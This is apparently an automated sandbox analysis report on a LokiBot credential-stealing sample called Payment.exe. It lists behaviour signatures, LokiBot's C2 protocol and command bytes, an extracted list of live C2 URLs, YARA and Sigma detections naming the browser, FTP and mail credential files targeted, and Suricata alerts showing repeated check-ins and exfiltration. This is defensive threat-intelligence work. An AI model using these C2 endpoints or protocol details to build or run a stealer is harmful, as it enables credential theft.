Edit tour

Windows Analysis Report
Payment.exe

Overview

General Information

Sample name:	Payment.exe
Analysis ID:	1626083
MD5:	f79e4de7214575cd58e80093282f0fbb
SHA1:	b1d29aae58c587dc17befc8fd02645b701331963
SHA256:	4a1337ce1b0e4eddd00b04b4559d8fc6b9bb30514a7e2ced19ac5691a6d93144
Tags:	exeuser-threatcat_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Lokibot

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected aPLib compressed binary

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Payment.exe (PID: 6096 cmdline: "C:\Users\user\Desktop\Payment.exe" MD5: F79E4DE7214575CD58E80093282F0FBB)

svchost.exe (PID: 2492 cmdline: "C:\Users\user\Desktop\Payment.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2981726781.000000000322A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Process Memory Space: Payment.exe PID: 6096	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Payment.exe PID: 6096	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Payment.exe PID: 6096	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xe90dd:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: svchost.exe PID: 2492	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 2492	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: svchost.exe PID: 2492	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 2492	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1efc9:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Payment.exe.1830000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Payment.exe.1830000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Payment.exe.1830000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Payment.exe.1830000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Payment.exe.1830000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Payment.exe.1830000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Payment.exe.1830000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Payment.exe.1830000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Payment.exe.1830000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Payment.exe.1830000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Payment.exe.1830000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Payment.exe.1830000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Payment.exe.1830000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.svchost.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
1.2.svchost.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.svchost.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
1.2.svchost.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.svchost.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.svchost.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.svchost.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.svchost.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.svchost.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.2.svchost.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.svchost.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 24 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Payment.exe", CommandLine: "C:\Users\user\Desktop\Payment.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment.exe", ParentImage: C:\Users\user\Desktop\Payment.exe, ParentProcessId: 6096, ParentProcessName: Payment.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment.exe", ProcessId: 2492, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Payment.exe", CommandLine: "C:\Users\user\Desktop\Payment.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment.exe", ParentImage: C:\Users\user\Desktop\Payment.exe, ParentProcessId: 6096, ParentProcessName: Payment.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment.exe", ProcessId: 2492, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-27T23:41:19.121169+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-27T23:41:21.010828+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49732	104.21.64.1	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-27T23:41:18.348276+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-27T23:41:20.264637+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49732	104.21.64.1	80	TCP
2025-02-27T23:41:21.084508+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-27T23:41:23.021054+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-27T23:41:25.175849+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-27T23:41:27.083384+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-27T23:41:28.974469+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-27T23:41:30.900861+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49738	104.21.64.1	80	TCP
2025-02-27T23:41:32.867990+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-27T23:41:34.795860+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-27T23:41:36.673081+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-27T23:41:38.584676+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-27T23:41:40.628415+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-27T23:41:42.497605+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-27T23:41:44.459058+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-27T23:41:46.424571+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-27T23:41:48.380355+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-27T23:41:50.303138+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-27T23:41:52.384767+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-27T23:41:54.315138+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-27T23:41:56.282080+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-27T23:41:58.153604+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-27T23:42:00.113162+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-27T23:42:02.089165+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-27T23:42:04.029219+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-27T23:42:05.961795+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-27T23:42:07.905333+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-27T23:42:09.784039+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49775	104.21.64.1	80	TCP
2025-02-27T23:42:11.709602+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49787	104.21.64.1	80	TCP
2025-02-27T23:42:13.644260+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49801	104.21.64.1	80	TCP
2025-02-27T23:42:15.759724+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49817	104.21.64.1	80	TCP
2025-02-27T23:42:17.703200+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49826	104.21.64.1	80	TCP
2025-02-27T23:42:19.576890+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49837	104.21.64.1	80	TCP
2025-02-27T23:42:21.436220+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49852	104.21.64.1	80	TCP
2025-02-27T23:42:23.237914+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49863	104.21.64.1	80	TCP
2025-02-27T23:42:25.207910+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49876	104.21.64.1	80	TCP
2025-02-27T23:42:27.093105+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49890	104.21.64.1	80	TCP
2025-02-27T23:42:29.032802+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49903	104.21.64.1	80	TCP
2025-02-27T23:42:31.093903+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49917	104.21.64.1	80	TCP
2025-02-27T23:42:32.997651+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49928	104.21.64.1	80	TCP
2025-02-27T23:42:35.360167+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49940	104.21.64.1	80	TCP
2025-02-27T23:42:37.289891+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49952	104.21.64.1	80	TCP
2025-02-27T23:42:39.269760+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49967	104.21.64.1	80	TCP
2025-02-27T23:42:41.224736+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49982	104.21.64.1	80	TCP
2025-02-27T23:42:43.021533+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49993	104.21.64.1	80	TCP
2025-02-27T23:42:44.950481+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50006	104.21.64.1	80	TCP
2025-02-27T23:42:46.933140+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50020	104.21.64.1	80	TCP
2025-02-27T23:42:48.714574+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50031	104.21.64.1	80	TCP
2025-02-27T23:42:50.665974+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50044	104.21.64.1	80	TCP
2025-02-27T23:42:52.600949+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50052	104.21.64.1	80	TCP
2025-02-27T23:42:54.555374+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50053	104.21.64.1	80	TCP
2025-02-27T23:42:56.506891+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50054	104.21.64.1	80	TCP
2025-02-27T23:42:58.409663+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50055	104.21.64.1	80	TCP
2025-02-27T23:43:00.602248+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-27T23:43:02.418608+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-27T23:43:04.447901+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-27T23:43:06.273683+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-27T23:43:08.180377+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-27T23:43:10.083396+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-27T23:43:12.023349+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-27T23:43:13.982660+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-27T23:43:15.922273+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-27T23:43:17.811982+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-27T23:43:19.826738+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50066	104.21.64.1	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
